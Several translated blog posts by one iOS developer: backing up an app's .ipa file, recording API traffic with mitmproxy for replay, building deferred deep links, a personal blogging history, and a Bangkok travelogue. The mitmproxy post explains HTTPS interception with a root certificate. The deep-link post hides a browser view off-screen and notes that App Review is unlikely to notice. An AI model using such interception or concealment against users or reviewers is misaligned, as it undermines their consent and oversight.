After an App is removed from the store, as long as the downloaded App is not actively deleted from the phone, it will always exist on that phone. If you change phones using the transfer method, it will also be transferred.
But if we accidentally delete the App or change phones without transferring it, then it will be gone forever. At this time, if we manually back up the .ipa file from the store, we can extend its life again.
A long time ago, the reverse engineering article mentioned this, but this time we only need to back up the .ipa file without jailbreaking, all using tools provided by Apple.
1. Install Apple Configurator 2
First, go to the Mac App Store to download and install Apple Configurator 2.
2. Connect iPhone to Mac and click Trust This Computer
Once connected successfully, the iPhone’s home screen will appear.
3. Ensure your phone has the app installed that you want to back up the .ipa file for
We need to use Apple Configurator 2 to get the .ipa file downloaded to the cache, so we need to make sure the target app is installed on the phone.
4. Go back to Apple Configurator 2 on the Mac
Double-click the iPhone home screen shown above to enter the information page.
Switch to “App” -> top right corner “+ Add” -> “App”
After logging into the App Store account, you can get a list of apps you have purchased before.
Search for the target app you want to back up, select it, and click “Add”.
A waiting window will appear, adding the app on XXX, downloading “XXX”.
5. Extract the .ipa file
Wait for it to finish downloading, a window will pop up asking if you want to replace the existing installed app.
Do not click anything at this time. Do not click anything at this time. Do not click anything at this time.
Open a Finder:
Select “Go” -> “Go to Folder” from the top left toolbar
Paste the following path:
~/Library/Group Containers/K36BKF7T3D.group.com.apple.configurator/Library/Caches/Assets/TemporaryItems/MobileApps
You can find the target app .ipa file that is downloaded and ready to be installed:
Copy it out to complete the app .ipa file backup.
After completing the file copy, go back to Apple Configurator 2 and click stop to terminate the operation.
Similarly, connect the phone to be restored to the Mac and open Apple Configurator 2, enter the app addition interface.
For restoration, select “Choose from my Mac…” in the bottom left corner.
Select the backed-up app .ipa file and click “Add”.
Wait for the transfer and installation to complete, then you can reopen the app on your phone, successfully revived!
Here we will use the method and open-source project mentioned in the previous App End-to-End Testing Local Snapshot API Mock Server article (refer to the details and principles).
With the same technique used for recording API Request & Response for E2E Testing, we can also use it to record the last API Request & Response Data before an app is taken down or shut down.
1. Install mitmproxy
brew install mitmproxy
mitmproxy is an open-source man-in-the-middle attack and network request sniffing tool.
If you are not familiar with the working principle of Mitmproxy man-in-the-middle attacks, you can refer to my previous article: “The APP uses HTTPS transmission, but the data was still stolen.” or the Mitmproxy official documentation.
If you are using it purely for network request sniffing and are not comfortable with the mitmproxy interface, you can also use “Proxyman” as referenced in another previous article.
2. Complete mitmproxy certificate setup
For HTTPS encrypted connections, we need to use a root certificate swap to perform a man-in-the-middle attack. Therefore, the first time you use it, you need to complete the root certificate download and activation on the mobile end.
*If your App & API Server has implemented SSL Pinning, you also need to add the Pinning certificate to mitmproxy.
Start mitmproxy or mitmweb (the Web GUI version) in Terminal.
mitmproxy
Seeing this screen means the mitmproxy service has started, and there is no traffic coming in, so it is empty. Keep this screen open and do not close the Terminal.
Go back to the phone’s WiFi settings, click “i” to enter detailed settings, and find “Configure Proxy” at the bottom:
Open Safari on the phone and enter: http://mitm.it/
If it shows:
If you can see this, traffic is not passing through mitmproxy.
It means the network proxy server on the phone was not set up successfully, or mitmproxy was not started on the Mac.
Under normal circumstances, it will show:
This means the connection is successful. At this point, only HTTP traffic can be sniffed, and HTTPS traffic will report an error, so we will continue with the setup.
Find the iOS section and click “Get mitmproxy-ca-cert.pem”.
After the download is complete, go to the phone’s settings, and you will see “Profile Downloaded”. Click to enter.
Go back to Settings -> “General” -> “About” -> At the bottom “Certificate Trust Settings” -> Enable “mitmproxy”.
At this point, we have completed all the preliminary work for the man-in-the-middle attack.
Remember that all the traffic on your phone will go through the proxy from your Mac computer. After the operation is completed, remember to go back to the network settings on your phone and turn off the proxy server settings, otherwise the phone’s WiFi will not be able to connect to the external network.
Go back to Terminal mitmproxy, and while operating the App on your phone, you can see all the captured API request records.
Each request can be entered to view detailed Request & Response content:
The above is the basic setup and actual work of mitmproxy.
3. Sniff and Understand the API Structure
Next, we will use mitmproxy’s mitmdump service combined with the mitmproxy-rodo addon I developed earlier to record and replay requests.
My implementation principle is to calculate a Hash value from the Request’s parameters. When replaying, the incoming request is hashed in the same way; if a backed-up Response with the same Hash value is found locally, it is returned. If there are multiple requests with the same Hash value, they are stored and replayed in order.
We can first use the method above to sniff the App’s API (or use Proxyman), observe which fields might affect the Hash mapping, and note them down for the exclusion settings later. For example, some APIs always carry a ?ts parameter that does not affect the returned content but does affect the Hash calculation, making it impossible to find the local backup; we need to pick such parameters out and exclude them in the settings later.
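To make this concrete, here is a small illustrative sketch in Swift of how such a request fingerprint could be computed while skipping volatile parameters like ts. This is only a conceptual sketch, not the actual mitmproxy-rodo code (the addon itself is the rodo.py mitmproxy script); the function name and example URLs are hypothetical.

import Foundation
import CryptoKit

// Illustrative only: hash the method, path, and sorted query parameters,
// skipping volatile keys (e.g. "ts") so equivalent requests map to the same key.
func requestFingerprint(method: String, url: URL, ignoredQueryKeys: Set<String>) -> String {
    let components = URLComponents(url: url, resolvingAgainstBaseURL: false)
    let stableQuery = (components?.queryItems ?? [])
        .filter { !ignoredQueryKeys.contains($0.name) }   // drop excluded parameters
        .sorted { $0.name < $1.name }                     // make ordering deterministic
        .map { "\($0.name)=\($0.value ?? "")" }
        .joined(separator: "&")
    let material = "\(method) \(components?.path ?? "")?\(stableQuery)"
    let digest = SHA256.hash(data: Data(material.utf8))
    return digest.map { String(format: "%02x", $0) }.joined()
}

// These two hypothetical calls produce the same fingerprint because "ts" is ignored:
// requestFingerprint(method: "GET", url: URL(string: "https://zhgchg.li/songs?id=1&ts=111")!, ignoredQueryKeys: ["ts"])
// requestFingerprint(method: "GET", url: URL(string: "https://zhgchg.li/songs?id=1&ts=222")!, ignoredQueryKeys: ["ts"])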
4. Set up mitmproxy-rodo:
Use the open-source recording and replay script I wrote.
For detailed parameter settings, please refer to the instructions of the open-source project.
git clone git@github.com:ZhgChgLi/mitmproxy-rodo.git
cd mitmproxy-rodo
Fill in the parameters picked out in step 3 into the config.json configuration file:
{
  "ignored": {
    "*": {
      "*": {
        "*": {
          "iterable": false,
          "enables": [
            "query",
            "formData"
          ],
          "rules": {
            "query": {
              "parameters": [
                "ts",
                "connect_id",
                "device_id",
                "device_name"
              ]
            },
            "formData": {
              "parameters": [
                "aidck",
                "device_id",
                "ver_name"
              ]
            }
          }
        }
      }
    }
  }
}
The above parameters will be excluded when calculating the Hash value, and specific exclusion rules can be set for individual Endpoint paths.
5. Enable recording, and execute in Terminal:
mitmdump -s rodo.py --set dumper_folder=zhgchgli --set config_file=config.json --set record=true "~d zhgchg.li"
"~d zhgchg.li" means to capture only the traffic of *.zhgchg.li.
dumper_folder: name of the output destination directory.
6. Operate the target App on the phone to execute the process paths you want to record
While operating, you will see many captured API Response Data in the output directory, stored according to Domain -> API path -> HTTP method -> Hash value -> Header-X / Content-X (if the same Hash request is made twice, it will be saved in order).
After recording, be sure to try replaying once to test if the data is normal. If the Hash Hit is very low (almost no corresponding Response found during replay), you can repeat the sniffing steps to find the variable that affects the Hash value each time the App is executed and exclude it.
Execute replay:
mitmdump -s rodo.py --set dumper_folder=zhgchgli --set config_file=config.json
dumper_folder: name of the directory containing the recorded data to replay.
At this point, we can reproduce the App’s final moments before it reaches its last stop, restoring both its bones (the backed-up .ipa) and its flesh and blood (the recorded API data), to remember the time when everyone worked together to build it.
This article commemorates the team of my first job and the time when I transitioned from web backend development to iOS App development, learning while doing, and independently producing a product from scratch in 3-4 months, together with Android, design, PM supervisors, and backend colleagues. Although it is about to reach the end of its life cycle, I will always remember the bittersweet moments and the excitement of seeing it go live and being used for the first time.
“Thank you”
If you have the same regrets, I hope this article can help you. Since mitmproxy-rodo was initially developed only as a POC (proof of concept) tool, contributions, bug reports, and PRs to fix issues are welcome.
For any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Build an app transition flow that adapts to all scenarios without interruption
Starting from iOS ≥ 16, when an app actively reads the clipboard without user-initiated action, a prompt will appear asking for permission. Users need to allow this for the app to access clipboard information.
UIPasteBoard’s privacy change in iOS 16
From graduating and completing military service to now working aimlessly for nearly three years, my growth has plateaued, and I have settled into a comfort zone. Fortunately, a decision to resign sparked a new beginning.
While reading “Designing Your Life” and reorganizing my life plan, I reflected on my work and life. Despite not having exceptional technical skills, sharing on Medium has allowed me to enter a state of “flow” and gain a lot of energy. Recently, a friend asked me about Deep Link issues, so I organized my research findings and replenished my energy in the process!
First, let’s explain the practical application scenarios:
- Tracking app download and open data: we want to know how many people actually download and open the app through a promotional link.
- Special event entrances: for example, receiving rewards by downloading and opening the app through a specific URL.
iOS ≥ 9
As seen, the iOS Deep Link mechanism itself only determines if the app is installed. If it is, the app opens; if not, it does nothing.
The URL Scheme part is controlled by the system and is generally used for internal app calls and rarely exposed publicly. If the trigger point is in an area you cannot control (e.g., Line link), it cannot be handled.
If the trigger point is on your own webpage, you can use some tricks to handle it. Please refer to this link:
<html>
<head>
    <title>Redirect...</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <script>
        var appurl = 'marry://open';
        var appstore = 'https://apps.apple.com/tw/app/%E7%B5%90%E5%A9%9A%E5%90%A7-%E6%9C%80%E5%A4%A7%E5%A9%9A%E7%A6%AE%E7%B1%8C%E5%82%99app/id1356057329';

        var timeout;
        function start() {
            window.location = appurl;
            timeout = setTimeout(function(){
                if(confirm('Install Marry App now?')){
                    document.location = appstore;
                }
            }, 1000);
        }

        window.onload = function() {
            start()
        }
    </script>
</head>
<body>

</body>
</html>
The general logic is to call the URL Scheme, set a Timeout, and if the page has not redirected within the set time, assume that the Scheme cannot be called and redirect to the APP Store page (but the experience is still not good as there will still be a URL error prompt, just with added automatic redirection).
Universal Link itself is a webpage. If there is no redirection, it defaults to being presented in a web browser. Websites with web services can choose to directly jump to the web browser for those services, or directly redirect to the APP Store page.
Websites with web services can add the following code within <head></head>:
<meta name="apple-itunes-app" content="app-id=APPID, app-argument=page parameter">
When browsing the web version on iPhone Safari, an APP installation prompt will appear at the top, along with a button to open the page using the APP; the app-argument parameter is used to pass page values through to the APP.
Flowchart of adding “redirect to APP Store if not available”
Of course, what we want is not just “open the APP when the user has it installed,” but also to link the referral information with the APP, so that the APP automatically displays the target page when opened.
The URL Scheme method can be handled in the AppDelegate’s func application(_ application: UIApplication, open url: URL, sourceApplication: String?, annotation: Any) -> Bool:
func application(_ application: UIApplication, open url: URL, sourceApplication: String?, annotation: Any) -> Bool {
    if url.scheme == "marry", let params = url.queryParameters {
        if params["type"] == "topic" {
            let VC = TopicViewController(topicID: params["id"])
            UIApplication.shared.keyWindow?.rootViewController?.present(VC, animated: true)
        }
    }
    return true
}
The Universal Link method is handled in the AppDelegate’s func application(_ application: UIApplication, continue userActivity: NSUserActivity, restorationHandler: @escaping ([Any]?) -> Void) -> Bool:
extension URL {
    /// test=1&a=b&c=d => ["test":"1","a":"b","c":"d"]
    /// Parse the URL query into a [String: String] dictionary
    public var queryParameters: [String: String]? {
        guard let components = URLComponents(url: self, resolvingAgainstBaseURL: true), let queryItems = components.queryItems else {
            return nil
        }

        var parameters = [String: String]()
        for item in queryItems {
            parameters[item.name] = item.value
        }

        return parameters
    }
}
First, an extension method queryParameters for URL is provided to easily convert URL Queries into a Swift Dictionary.
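For example (with a hypothetical URL):

let url = URL(string: "https://zhgchg.li/web/topic?type=topic&id=1")!
print(url.queryParameters ?? [:]) // ["type": "topic", "id": "1"]

The Universal Link handler below then uses this extension on the incoming webpageURL.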
func application(_ application: UIApplication, continue userActivity: NSUserActivity, restorationHandler: @escaping ([Any]?) -> Void) -> Bool {

    if userActivity.activityType == NSUserActivityTypeBrowsingWeb, let webpageURL = userActivity.webpageURL {
        /// If it is a universal link URL source...
        if let params = webpageURL.queryParameters, params["type"] == "topic" {
            let VC = TopicViewController(topicID: params["id"])
            UIApplication.shared.keyWindow?.rootViewController?.present(VC, animated: true)
        }
    }

    return true
}
Done!
It looks perfect now, we’ve handled all the scenarios we might encounter, so what else is missing?
What is a Deferred Deep Link? It extends our Deep Link so that the referral data is preserved even when the user first has to install the app from the APP Store.
According to Android engineers, Android itself has this feature, but it is not supported on iOS, and the method to achieve this is not user-friendly. Keep reading to find out more.
If you don’t want to spend time doing it yourself, you can directly use branch.io or Firebase Dynamic Links. The method introduced in this article is the approach Firebase uses.
There are two ways to achieve the effect of Deferred Deep Link:
One is to calculate a hash value based on the user’s device, IP, environment, etc., and store the data on the server from the web side; when the APP is opened after installation, the same calculation is performed, and if the values match, the data is retrieved (branch.io’s method).
The other is the method introduced in this article, similar to Firebase’s approach: using the iPhone clipboard, or the Safari and APP Cookie sharing mechanism, which means storing the data in the clipboard or a Cookie and then reading it out after the APP is installed.
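Before moving on to the clipboard/cookie method, here is a rough sketch of what the first (fingerprint-matching) approach looks like on the app side. This is only an illustration of the idea, not branch.io’s actual algorithm; the chosen signals and the function name are assumptions.

import UIKit
import CryptoKit

// Both the web page and the app derive a coarse fingerprint from device/environment
// signals; the server matches the two within a short time window to hand back the referral data.
func deviceFingerprint() -> String {
    let signals = [
        UIDevice.current.model,          // e.g. "iPhone"
        UIDevice.current.systemVersion,  // e.g. "17.5"
        Locale.current.identifier,       // e.g. "zh_TW"
        "\(Int(UIScreen.main.bounds.width))x\(Int(UIScreen.main.bounds.height))"
    ]
    let digest = SHA256.hash(data: Data(signals.joined(separator: "|").utf8))
    return digest.map { String(format: "%02x", $0) }.joined()
}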
After clicking “Open,” JavaScript automatically writes the relevant information to your clipboard and redirects, e.g.: https://XXX.app.goo.gl/?link=https://XXX.net/topicID=1&type=topic
Those who have used Firebase Dynamic Links must be familiar with this opening redirect page. Once you understand the principle, you will know that this page cannot be removed from the process!
Additionally, Firebase does not provide style modifications.
First, let’s talk about the support issue; as mentioned earlier, it is “not user-friendly”!
If the APP only considers iOS ≥ 10, it is much easier. The APP implements clipboard access, the Web uses JavaScript to overwrite information to the clipboard, and then redirects to the APP Store for download.
iOS = 9 does not support automatically writing to the clipboard with JavaScript, but it does support the “Cookie sharing method” between Safari and the APP’s SFSafariViewController.
Also, the APP needs to secretly add SFSafariViewController in the background to load the Web, and then obtain the Cookie information stored when clicking the link from the Web.
The process is cumbersome & link clicks are limited to Safari browser.
According to the official documentation, iOS 11 can no longer access the user’s Safari Cookie. If you have such a requirement, you can use SFAuthenticationSession, but this method cannot be executed stealthily in the background, and a confirmation window will pop up each time before loading.
SFAuthenticationSession Prompt
Also, App Review does not allow placing an SFSafariViewController where users cannot see it. (Although triggering it programmatically and adding it as a subview is unlikely to be noticed during review.)
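For reference, a minimal sketch of the SFAuthenticationSession flow mentioned above (iOS 11 only; it was later replaced by ASWebAuthenticationSession in iOS 12), reusing this article’s example URL and scheme. Calling start() is what triggers the confirmation window, which is why it cannot run silently.

import SafariServices

var authSession: SFAuthenticationSession? // keep a strong reference while it is running

func loadSharedCookiePageWithAuthSession() {
    guard let url = URL(string: "http://app.marry.com.tw/loadCookie.html") else { return }
    authSession = SFAuthenticationSession(url: url, callbackURLScheme: "marry") { callbackURL, error in
        // If loadCookie.html redirects to a marry:// URL, it arrives here instead of AppDelegate.
        guard let callbackURL = callbackURL else { return }
        print(callbackURL) // hand it to the same deep link handling used elsewhere in this article
    }
    _ = authSession?.start() // this call is what shows the confirmation prompt every time
}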
Let’s start with something simple, considering users with iOS ≥ 10, simply transfer information using the iPhone clipboard.
We customized our own page similar to Firebase Dynamic Links, using the clipboard.js package to copy the information we want to bring into the app (marry://topicID=1&type=topic) to the clipboard when the user clicks “Go Now”, and then using location.href to redirect to the App Store page.
Read the clipboard value in AppDelegate or the main UIViewController:
let pasteData = UIPasteboard.general.string
It is recommended to wrap the information using the URL Scheme method here for easy identification and data decryption:
if let pasteData = UIPasteboard.general.string, let url = URL(string: pasteData), url.scheme == "marry", let params = url.queryParameters {
    if params["type"] == "topic" {
        let VC = TopicViewController(topicID: params["id"])
        UIApplication.shared.keyWindow?.rootViewController?.present(VC, animated: true)
    }
}
Finally, after completing the action, use UIPasteboard.general.string = "" to clear the information in the clipboard.
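Putting the pieces together, a minimal sketch of the read, handle, and clear flow (TopicViewController and the marry:// payload are this article’s own examples, and queryParameters is the extension defined earlier):

func consumeDeferredDeepLinkFromPasteboard() {
    guard let pasteData = UIPasteboard.general.string,
          let url = URL(string: pasteData),
          url.scheme == "marry",
          let params = url.queryParameters else { return }

    UIPasteboard.general.string = "" // clear it so the referral is only consumed once

    if params["type"] == "topic" {
        let VC = TopicViewController(topicID: params["id"])
        UIApplication.shared.keyWindow?.rootViewController?.present(VC, animated: true)
    }
}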
Here comes the tricky part, supporting the iOS 9 version. As mentioned earlier, due to the lack of clipboard support, we need to use the Cookie Exchange Method.
Handling the web end is relatively straightforward: just change it so that when the user clicks “Go Now,” the information we want to bring into the app (marry://topicID=1&type=topic) is stored in a Cookie, and then use location.href to redirect to the App Store page.
Here are two pre-packaged JavaScript methods for handling Cookies to speed up development:
/// name: Cookie name
/// val: Cookie value
/// day: Cookie expiration period, default is 1 day
/// EX1: setcookie("iosDeepLinkData","marry://topicID=1&type=topic")
/// EX2: setcookie("hey","hi",365) = valid for one year
function setcookie(name, val, day) {
    var exdate = new Date();
    day = day || 1;
    exdate.setDate(exdate.getDate() + day);
    document.cookie = "" + name + "=" + val + ";expires=" + exdate.toGMTString();
}

/// getCookie("iosDeepLinkData") => marry://topicID=1&type=topic
function getCookie(name) {
    var arr = document.cookie.match(new RegExp("(^| )" + name + "=([^;]*)(;|$)"));
    if (arr != null) return decodeURI(arr[2]);
    return null;
}
Here comes the most troublesome part of this document.
As mentioned earlier, we need to secretly load an SFSafariViewController in the background in the main UIViewController to implement the principle.
Another pitfall with loading it secretly: on iOS ≥ 10, if the SFSafariViewController’s view is sized smaller than 1 pt, has an alpha below 0.05, or is set to isHidden, the SFSafariViewController will not load.
p.s iOS = 10 supports both Cookies and Clipboard simultaneously.
My approach here is to place a UIView of any height on the main page’s UIViewController, aligned to the bottom of the main UIView, then drag an IBOutlet (sharedCookieView) into the class; in viewDidLoad(), initialize the SFSafariViewController and add its view to sharedCookieView, so it actually displays and loads, just off-screen where the user can’t see it 🌝.
Where should the URL of SFSafariViewController point to?
Similar to sharing a page on the web, we need to create a separate page for reading Cookies, and place both pages under the same domain to avoid cross-domain Cookie issues, the page content will be provided later.
@IBOutlet weak var sharedCookieView: UIView!

override func viewDidLoad() {
    super.viewDidLoad()

    guard let url = URL(string: "http://app.marry.com.tw/loadCookie.html") else { return }
    let sharedCookieViewController = SFSafariViewController(url: url)
    sharedCookieViewController.view.frame = CGRect(x: 0, y: 0, width: 200, height: 200)
    sharedCookieViewController.delegate = self

    self.addChildViewController(sharedCookieViewController)
    self.sharedCookieView.addSubview(sharedCookieViewController.view)

    sharedCookieViewController.beginAppearanceTransition(true, animated: false)
    sharedCookieViewController.didMove(toParentViewController: self)
    sharedCookieViewController.endAppearanceTransition()
}
sharedCookieViewController.delegate = self requires conforming to the delegate protocol, e.g. class HomeViewController: UIViewController, SFSafariViewControllerDelegate; this delegate is needed to capture the callback after loading completes.
We can capture the load-completion event in:
func safariViewController(_ controller: SFSafariViewController, didCompleteInitialLoad didLoadSuccessfully: Bool)
At this point, you might think that reading the cookies in didCompleteInitialLoad completes the process!
However, I couldn’t find a way to read the SFSafariViewController’s cookies here; the methods found online always returned empty.
Alternatively, you would need to interact with the page content using JavaScript, having JavaScript read the cookies and hand them back to the UIViewController.
Since the iOS side has no way to get the shared cookies, we can simply let the “cookie-reading page” read the cookies for us.
The JavaScript method for handling cookies provided earlier with the getCookie() function is used here. Our “cookie-reading page” is a blank page (users can’t see it anyway), but in the JavaScript part, we need to read the cookies after the body onload event:
<html>
<head>
    <title>Load iOS Deep Link Saved Cookie...</title>
    <script>
        /// The setcookie()/getCookie() helpers defined earlier must also be included on this page.
        function checkCookie() {
            var iOSDeepLinkData = getCookie("iOSDeepLinkData");
            if (iOSDeepLinkData && iOSDeepLinkData != '') {
                setcookie("iOSDeepLinkData", "", -1);
                window.location.href = iOSDeepLinkData; /// marry://topicID=1&type=topic
            }
        }
    </script>
</head>

<body onload="checkCookie();">

</body>

</html>
The actual principle is summarized as follows: add an SFSafariViewController in HomeViewController’s viewDidLoad to secretly load the loadCookie.html page. The loadCookie.html page checks for and reads the previously stored cookie, clears it if found, and then uses window.location.href to trigger the URL Scheme mechanism.
So the corresponding callback handling goes back to func application(_ application: UIApplication, open url: URL, sourceApplication: String?, annotation: Any) in AppDelegate.
If you find this cumbersome, you can directly use branch.io or Firebase Dynamic Links without reinventing the wheel. Here, it is because of interface customization and some complex requirements that we had to build it ourselves.
iOS 9 users are already very rare, so you can ignore it if it’s not necessary; using the clipboard method is fast and efficient, and using the clipboard means you don’t have to limit the links to be opened in Safari!
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
It has been over 4 years since I last managed a blog. The remaining ad revenue of US$88 has been stuck there. Recently, I discovered that I could request to cancel my Adsense account, and as long as I reach the minimum payout threshold, Google will give me the final payment. This has given me the motivation to start writing a blog again.
Starting fresh, I chose the simple title “The Beginning is Always the Hardest” as a starting point.
Reflecting on my history of blogging, it started around middle school when I was most obsessed with games. The family computer was very old and couldn’t run many games, but at that playful age, even if there were no games to play, I still had to turn on the computer every day. It was already very novel to me at that time.
Due to the above factors, most of my computer time was spent chatting with classmates on instant messaging and browsing web pages. As you can imagine, it was quite empty and lacked a sense of accomplishment (at least others could gain a sense of accomplishment from playing games).
At that time, “blogs” were very popular and very new to me. The first one I encountered was the once-popular Wretch.cc. When I created an account and opened my blog for the first time, I felt, “Wow! I have my own website,” and “Wow! I can change the style, so cool.” Coincidentally, the school’s computer class taught web design (Front-Page 2003/ Sheng’s Website), so my first blog was all about exploring the features, finding materials, playing with styles, and installing many “cool” JavaScript plugins. In contrast, the content quality was basically junk.
This gave me a deeper understanding of the online world, such as how to find information, how to fix broken plugins, how to embed images, etc.
Many of the resources were obtained from forums, which were also very popular at the time. However, I was a typical lurker who only read and rarely posted, occasionally replying with “Thanks for the generous share.” While browsing various forums, I discovered “free forums,” where you could become an admin and have your own forum just by signing up. This was a level higher than blogs, and being an “admin” was super cool!
Combining the basics of playing with blog settings, forums had even more settings to play with (creating boards, member permissions, plugin centers). Everything could be set by yourself, like entering another world.
There were many free forum systems, and I kept switching and trying them out. Some had incomplete features, some were not free, some were unstable, and some had too many ads. The one I remember most was Marlito, which best met my needs and was the one I managed the longest.
At the same time, I moved my blog to “YouthWant Blog.” The reason was that Wretch.cc started imposing various restrictions, and YouthWant was just starting, with fewer restrictions and features that met my needs. This time, I focused on content, with 70% sharing useful software (similar to A-Rong’s Welfare) and 30% sharing forum experiences (settings/bug fixes).
I wrote about 30 posts, with daily views around 200 and a peak of 500 (not much by today’s standards). I was in the top 10 of YouthWant’s blog rankings, with most traffic coming from posts sharing useful software. I managed it seriously for over a year, but then got busy with schoolwork in the third year of middle school and high school. Eventually, I joined a training program and left the blog idle.
Due to the blog name being too cheesy, only a screenshot of the view count is shown.
Later, I created another Blogger for technical articles, recording programming issues and solutions. However, Blogger was not user-friendly, and its basic features couldn’t meet my needs, so I gave up after a few posts.
In the later stages, I applied for a domain and bought hosting to set up a WordPress blog. But everything had to be done by myself—setting up, adjusting features. I couldn’t focus on writing content, so it was also written intermittently. After the hosting expired, I didn’t renew it, and the website went offline until now.
In summary, the journey went from finding the concept of a blog very novel, to exploring and mastering blog functionalities, to focusing on the essence of a blog (the content of the articles), to sharing technical articles.
Laziness, recording, reviewing, and sharing less, and the allure of advertising revenue gradually led me further away from my original intention: the simple enthusiasm of sharing with everyone.
https://www.flickr.com/photos/zuvonne/3738631215
This article is also published on my personal Blog: [Click here to visit].
For any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Returning to Thailand after the pandemic, a quick 5-day free and easy trip to Bangkok.
Going back to 2018, it was the first company trip of my first job after entering the workforce, and also my first time traveling abroad, to Bangkok + Hua Hin (5 days); the following year in 2019, I went to Sabah with colleagues on another company trip; then the pandemic stole two years from us, and after it ended, I started going on crazy free and easy trips to Japan.
Back then, I was a newbie, with zero social experience, blindly following my older colleagues. I didn’t even know what I could or couldn’t bring on the plane. During security check, I absentmindedly placed my passport on the basket, and almost lost it when it fell off the conveyor belt (if it had fallen into a gap, I wouldn’t have been able to retrieve it); that time, it was a mindless guided tour, mindlessly riding tour buses. My impression of Bangkok wasn’t very clear, I only remember that the rooftop bar was great, the weather was hot, things were cheap, and massages were affordable. I had no concept of the geographical locations.
So, I always wanted to revisit Bangkok to relive the memories from six years ago. However, not being familiar with Southeast Asia, I was a bit hesitant to travel alone. Coincidentally, at the beginning of the year, while bantering with Pinkoi colleagues, we ended up planning this 5-day free and easy trip to Bangkok.
Details and fragments of memories from the 2018 Bangkok + Hua Hin 5-day trip are included in the appendix at the end of this document.
Because I started a new job in June, I didn’t have much time for leisure activities. Mark and Sean were mainly responsible for arranging and planning, so I didn’t do much homework.
⚠️⚠️⚠️I have placed the safety and precautions for traveling to Bangkok, Thailand after the travelogue. You may skip the travelogue but it is essential to understand the precautions against scams and things to be aware of, especially if you encounter marijuana.
Due to the rushed preparation this time, I hadn’t arranged for internet access the day before and didn’t have time to buy a physical SIM card. Fortunately, I tried eSIM for the first time and loved it after using it.
I directly purchased the [Thailand SIM Card | AIS 5G High-Speed Internet 8 Days Unlimited Data + Calls eSIM](https://www.kkday.com/zh-tw/product/137037-ais-16-day-unlimited-data-esim-activate-before-may-3-2023-thailand?cid=19365) from KKday. After purchasing, I received the eSIM activation certificate and could start using it.
Thailand SIM Card | AIS 5G High-Speed Internet 8 Days Unlimited Data + Calls eSIM
Mainly for unlimited data usage, cheaper than physical SIM cards, 8 days for NT $232.
Airline: Thai VietJet Air
Price: TWD $9,259
(including additional round-trip 15 kg checked baggage)
Initially, I wanted to travel with my friends, but they didn’t check in any baggage (their ticket price was around $6,000), and later when I checked other airlines, I felt like I was losing out; regular airlines were around $10,000 during similar periods, not much of a difference, but much more comfortable!
In fact, Thai VietJet Air allows baggage to be carried without checking in. Passengers can bring two pieces of carry-on baggage with a total weight not exceeding 7 kilograms.
1. Carry-on baggage weight:
Each passenger (except infants) can bring 1 piece of their own baggage and 1 small carry-on item, with a maximum total weight not exceeding 7 kg.

2. Carry-on baggage dimensions:
- 1 piece of carry-on baggage with maximum dimensions of 56cm x 36cm x 23cm
- 1 small carry-on item (one of the following):
  - 1 handbag, magazine, camera, baby food bag, or bag purchased at the airport, with dimensions not exceeding 30cm x 20cm x 10cm
  - 1 coat with dimensions not exceeding 114cm x 60cm x 11cm when unfolded
  - 1 laptop (notebook) with maximum dimensions of 40cm x 30cm x 10cm
Information as of 2024/08/22, subject to the latest official announcements.
Basically, carrying a backpack and dragging a carry-on suitcase is enough.
Received a flight change notice around 11 pm on 8/1, with the schedule changed to depart at 16:35 and arrive at 19:20.
JC KEVIN SATHORN BANGKOK HOTEL
36 Narathiwas-Ratchanakarin Road, Yannawa, Sathorn, Bangkok, Thailand, 10120
A friend exchanged 3,000 THB in advance, while I exchanged at SuperRich upon arrival.
Register and link a credit card to Grab in Taiwan for convenient use.
Prepared Taiwanese souvenirs for Agoda’s top performer.
Left home around 12:30 pm after work.
Remember to take the Airport MRT Express train, even if you take the regular train in the morning, it won’t arrive earlier than the Express train!
Arrived at Taoyuan Airport Terminal 1 around 1:30 pm.
The check-in counter was completely empty, so I checked in and completed the baggage drop directly upon arrival.
Once again, it’s B1R, the furthest gate that requires taking a shuttle.
It was still early before 4:00 PM, so I decided to have another meal at the airport. This time, I found out that I could order individual items at the restaurant, not just fried chicken as before!
I discovered that walking further ahead from the restaurant leads directly to the second terminal. So, if you have plenty of time, you can walk to the second terminal for food or come back to the first terminal to relax at the free VIP lounge.
After buying food, I went to the free VIP lounge at the first terminal to rest and eat. This time, I saw people charging their devices. Last time I was here, all the power outlets were taken, but it seems they have fixed it now.
The flight information wasn’t updated, showing 4:00 PM, but the actual departure time was changed to 4:35 PM.
Due to flight delays, the actual departure time was 5:13 PM.
I heard from colleagues that during peak hours at Bangkok Airport, you can purchase the Thailand Airport BKK Departure Meet and Greet Fast Track Service for quick clearance. However, when we arrived, there were hardly any passengers, so the clearance was quick.
Possibly due to the budget airline, there were not many checked bags, so the luggage retrieval was very fast.
Upon exiting the airport, I started to figure out how to set up and activate the eSIM, only to realize…
⚠️Activating eSIM requires an internet connection⚠️
It’s like buying a pair of scissors but needing another pair of scissors to open it. Activating the eSIM requires an initial internet connection for activation. Luckily, a friend traveling with me had already activated their eSIM in Taiwan, so I borrowed their internet to activate mine. (There is also Wi-Fi available at the airport, so no need to worry too much.)
I found the eSIM activation page and simply long-pressed the QR code to select “Add to eSIM.”
For some reason, if you save the QR code to photos or notes, you won’t have the quick add function. Another method is to send the QR code to a companion or print it out for scanning with your phone.
iPhone iOS eSIM manual setup path: Settings -> Mobile Network -> Add eSIM -> Scan QR Code -> Enter information manually -> Enter the information from the activation message -> For “Use for,” choose “Travel” -> Select “Travel” for mobile data -> Done!
After activation, it works like dual-SIM standby; however, if your original SIM does not have a roaming plan, it will have no network connection. In case of emergency, you can switch back to your original SIM card number!
Because it takes over an hour to get to the city and the hotel, and the budget airline does not provide meals, everyone was hungry, so we decided to have dinner at the airport first.
We found a Thai restaurant; the shredded pork was spicy and refreshing, and the vegetable soup helped ease the spiciness.
👉👉👉You can refer to KKday airport transfer service:
- [Thailand Airport Private Transfer Suvarnabhumi Airport (BKK) / Don Mueang Airport (DMK) - Bangkok/Pattaya/Hua Hin City Hotels](https://www.kkday.com/zh-tw/product/3431-bkk-or-dmk-bangkok-private-transfer?cid=19365)
- [Bangkok Airport Transfer Bangkok City Private Car to Suvarnabhumi Airport (BKK)/Don Mueang Airport (DMK)](https://www.kkday.com/zh-tw/product/138989?cid=19365)
Around 21:00, they started moving to the city and hotel.
